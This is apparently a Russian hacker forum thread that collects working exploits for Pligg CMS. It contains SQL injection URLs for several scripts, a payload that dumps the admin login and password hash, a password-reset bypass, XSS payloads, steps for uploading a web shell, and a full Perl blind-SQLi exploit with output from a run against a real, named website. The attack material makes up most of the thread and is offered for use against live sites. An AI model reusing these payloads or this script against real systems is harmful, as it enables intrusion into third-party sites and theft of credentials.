Продукт: Pligg Content Management System Beta 9.8 09.08.2007 Homepage: http://www.pligg.comДорк: Powered By Pligg Blind SQL-injection magic_quotes = off /out.php PHP: ------------------------ ... requestID = $_REQUEST['id']; $requestTitle = $_REQUEST['title']; $requestURL = $_REQUEST['url']; if(isset($requestTitle)){ $requestID = $db->get_var("SELECT link_id FROM " . table_links . " WHERE `link_title_url` = '$requestTitle';"); } if(isset($requestURL)){ $requestID = $db->get_var("SELECT link_id FROM " . table_links . " WHERE `link_url` = '$requestURL';"); } if(is_numeric($requestID)) { ... ------------------------ exploit: http://pligg/out.php?title=' union select if(true,1,null) -- - http://pligg/out.php?title=' union select if(false,1,null) -- -example: exploit: http://pligg/out.php?url=' union select if(true,1,null) -- - http://pligg/out.php?url=' union select if(false,1,null) -- -example: Blind SQL-injection register_globals = on /userrss.php PHP: ------------------------ ... if(isset($_REQUEST['user'])){$login = $_REQUEST['user'];} $user=new User(); $user->username = $login; if(!$user->read()) { echo "error: user does not exist"; die; } ... if(!empty($_REQUEST['rows'])) $rows = $_REQUEST['rows']; else $rows = 40; ... if(!empty($_REQUEST['status'])) { $status = $_REQUEST['status']; } else { // By default it searches on all if($search) $status = 'all'; else $status = 'all'; } switch ($status) { case 'published': $order_field = 'link_published_date'; $link_date = 'published_date'; $title = $main_smarty->get_config_vars("PLIGG_Visual_Published_News"); $from_where = "FROM " . table_links . " WHERE link_status='published' "; break; case 'queued': ... case ... case ... } $from_where .= " AND link_author=$user->id "; //вот тут можно дописать кусок скул-запроса. $order_by = " ORDER BY $order_field DESC "; $last_modified = $db->get_var("SELECT UNIX_TIMESTAMP(max($order_field)) links $from_where"); $sql = "SELECT DISTINCT link_id $from_where $order_by LIMIT $rows"; ------------------------ exploit http://pligg/userrss.php?user=god&rows=5&status=1&order_field=link_date&from_where=from pligg_links where link_id=1 and true -- - http://pligg/userrss.php?user=god&rows=5&status=1&order_field=link_date&from_where=from pligg_links where link_id=1 and false -- -example Blind SQL-injection magic_quotes_gpc = off /login.php PHP: ------------------------ ... if($_POST["processlogin"] == 3) { // if user requests forgotten password $username = trim($_POST['username']); if(strlen($username) == 0){ $errorMsg = $main_smarty->get_config_vars("PLIGG_Visual_Login_Forgot_Error"); } else { $user = $db->get_row("SELECT * FROM `" . table_users . "` where `user_login` = '".$username."'"); if($user){ $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH); ... ------------------------ exploit: POST:http://pligg/login.php?processlogin=3&username=root' or false -- - POST:http://pligg/login.php?processlogin=3&username=root' or true -- - if file_priv=Y /login.php?processlogin=3&username=root' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 into outfile '/path/pligg.txt' -- - Blind SQL-injection magic_quotes = off /story.php PHP: ------------------------- ... if(isset($_REQUEST['title'])){$requestTitle = strip_tags($_REQUEST['title']);} ... if(isset($requestTitle)){ $tmp = "SELECT link_id FROM " . table_links . " WHERE `link_title_url` = '$requestTitle';"; $requestID = $db->get_var($tmp); } ... ------------------------- exploit: http://pligg/story.php?title=существующий title' and (substring(version(),1,1))>1-- -example: Blind SQL-injection /editlink.php PHP: ------------------------- ... if(isset($_GET['id'])){ $theid = strip_tags($_GET['id']); } if(isset($_POST['id'])){ $theid = strip_tags($_POST['id']); } ... $link = $db->get_row("SELECT link_id, link_author FROM " . table_links . " WHERE link_id=".$theid.";"); if ($link) { if ($link->link_author==$current_user->user_id || $current_user->user_level == "admin" || $current_user->user_level == "god") { ... ------------------------- exploit http://pligg/editlink.php?id=-1 union select 1,if(true,'god',1)-- - http://pligg/editlink.php?id=-1 union select 1,if(false,'god',1)-- - if file_priv=Y http://pligg/editlink.php?id=-1 union select 1,2 into outfile 'c:/pligg.txt'-- -example: (c) AFoST
AFoST, в версии 1.0.0. все Blind'и не работают) т.е. разработчики добавили ф-цию "антихак" sanitize(, и теперь код уже выглядит уже так% PHP: $requestID = sanitize($_REQUEST['id'], 3); $requestTitle = sanitize($_REQUEST['title'], 3); $requestURL = sanitize($_REQUEST['url'], 3); Pligg 1.0.0 pXSS /register_complete.php PHP: $user=$_GET['user']; $usr = new User(); $usr->username = $user; if ($usr->read()){ $email = $usr->email; } exploit: Code: /register_complete.php?user=a<script>alert(/xss/);</script> example: Code: http://www.gossipsnipper.com/register_complete.php?user=a<script>alert(/xss/);</script> Full path disclosure Code: /install/header.php /install/install0.php /install/troubleshooter.php /install/install1.php /install/menu.php /libs/backup/mysql_backup/backup.php /libs/backup/mysql_backup/init.php
Full path disclosure /Config_File.class.php /Smarty_Compiler.class.php /Smarty_Test.class.php /class.compiler.php /podcast.php /settings.phpDirectory listing при удачном htaccess http://pligg/cache/ http://pligg/internal/ http://pligg/evb/ http://pligg/libs/ http://pligg/modules/ http://pligg/plugins/ http://pligg/templates/ http://pligg/templates_c/
Она и в той версии был) но не везде =) В этом двиге тот самый интересный Сцукокод на смену админского пароля)) Докрутить б...
User password reset to "password" Спасибо Gifts за помощь PHP: if($_GET["processlogin"] == 4) { // if user clicks on the forgotten password confirmation code $username = trim($_GET['username']); if(strlen($username) == 0){ $errorMsg = $main_smarty->get_config_vars("PLIGG_Visual_Login_Forgot_Error"); } else { $confirmationcode = $_GET["confirmationcode"]; $DBconf = $db->get_var("SELECT `last_reset_code` FROM `" . table_users . "` where `user_login` = '".$username."'"); if($DBconf){ if($DBconf == $confirmationcode && !empty($confirmationcode)){ $db->query('UPDATE `' . table_users . '` SET `last_reset_code` = "" WHERE `user_login` = "'.$username.'"'); $db->query('UPDATE `' . table_users . '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login` = "'.$username.'"'); $errorMsg = $main_smarty->get_config_vars('PLIGG_Visual_Login_Forgot_PassReset'); exploit: /login.php?processlogin=4&username=" or user_login = "god" /*' and 1=0 UNION select 123/*&confirmationcode=123
Version: 1.0.1 (возможно более ранние версии) Default table prefix: pligg_ SQL Injection Vuln file: /libs/search.php кода довольно много, приводить не буду Exploit: Code: http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/search.php?search=paxek&slink=1&scategory=1[COLOR=White])+union+select+(select+concat(0x3c62723e,user_login,0x3a,user_pass,0x3c62723e)+from+[/COLOR][COLOR=Red][prefix][/COLOR][COLOR=White]users+where+user_id=1),null,null--+&adv=1[/COLOR] Version: 1.0.3 (последняя на данный момент) Blind SQL Injection Vuln file: /libs/search.php Exploit: Code: http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/search.php?search=[COLOR=Red][search_keywords][/COLOR]&slink=1&scategory=1[COLOR=Red][inj][/COLOR]&adv=1 Вывода как в версии 1.0.1 не получилось добиться, т.к по дефолту в конфиге "error_reporting(E_ERROR)", поэтому крутим как blind. Написал эксплойт под это дело. Code: #!/usr/bin/perl use LWP; use Fcntl; $title = " [*]=====================================[*] ! ! ! Pligg CMS Blind SQL Injection Exploit ! ! ! ! Found && coded by RulleR ! ! Antichat.ru ! ! ! [*]=====================================[*] "; print $title; print "\n[+] Enter Host: "; chop ($host = <>); print "\n[+] Enter Search Keywords: "; chop ($searchkey = <>); print "\n[+] Enter \"scategory\": "; chop ($scat = <>); print "\n[>] Exploiting started... $host\n\n"; print " Please wait...\n\n"; #________________ CONFIG _______________ $regexp = '<a href=.*>'.$searchkey; $length = 100; $column = 'user_login';#concat_ws(0x3a,user_login,user_pass) $prefix = 'pligg_'; $table = 'users'; $user_id = 1; $filename = 'Pligg_exp_result.txt'; #_______________________________________ XEK: for ($start = 1; $start <= $length; $start++) { $min = 0;$max = 255; while(1) { $x = int(($max - $min)/2 + $min); if (&WebGet($host,$start,$x) =~ /$regexp/) { $min = $x; } else { $max = $x; } last XEK if ($max == 1); if ($max - $min == 1) { $char = chr($max); push (@res, $char); print @res,"\n";last; } } } print "\n[!] Exploiting finished :)\n\n"; print "---------------------- [Result] ----------------------\n"; print @res,"\n"; print "------------------------------------------------------\n"; sysopen (RESULT, $filename, O_WRONLY | O_CREAT); print RESULT $title; print RESULT "\n---------------------- [Result] ----------------------\n"; print RESULT @res; print RESULT "\n------------------------------------------------------\n"; close (RESULT); print "\nResult saving in $filename\n"; sub WebGet() { $inj = '/search.php?search='.$searchkey.'&slink=1&scategory='.$scat.'+and+ord(substr((select+'.$column.'+from+'.$prefix.$table.'+where+user_id='.$user_id.'),'.$_[1].',1))>'.$_[2].'&adv=1'; $request = HTTP::Request->new(GET => $_[0].$inj); $u_a = LWP::UserAgent->new(); $u_a->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $u_a->timeout(10); $response = $u_a->request($request); if ($response->is_error) { print " ! Error: ".$response->status_line.".\n"; die " :(\n"; } return $response->content; } или берем с pastebin.com Пример работы (получение login'а админа): Code: D:\\$_W3b-x3q\cms_all>pligg_exp.pl [*]=====================================[*] ! ! ! Pligg CMS Blind SQL Injection Exploit ! ! ! ! Found && coded by RulleR ! ! ! [*]=====================================[*] [+] Enter Host: http://doanhnhanso.com/news [+] Enter Search Keywords: Online [+] Enter "scategory": 6 [>] Exploiting started... http://doanhnhanso.com/news Please wait... d do doa doan doanh doanhn doanhnh doanhnha doanhnhan doanhnhans doanhnhanso [!] Exploiting finished :) ---------------------- [Result] ---------------------- doanhnhanso ------------------------------------------------------ Result saving in Pligg_exp_result.txt Passive XSS Exploit: Code: http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/search.php?search=[COLOR=White]</title><script>alert(1)</script>[/COLOR] http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/search.php[COLOR=White]?"><script>alert(1)</script>[/COLOR] ------------------------------------------------------------ [COLOR=PaleGreen]Need:[/COLOR] register_globals = [B]ON[/B] http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/advancedsearch.php?category_option=[COLOR=White]<script>alert(1)</script>[/COLOR] Upload shell Need:admin account Admin --> Modules Устанавливаем модуль Upload (по дефолту не установлен), включаем модуль (кликаем Disable). Далее переходим в Settings --> General Settings в Allowed File Type дописываем расширение php. Добавляем новость и прикрепляем шелл. Шелл будет в /modules/upload/attachments/[name_shell].php
RulleR, даже если вывода через ошибку нет, всё равно в сплоитах стоит использовать бинарный поиск, как минимум.
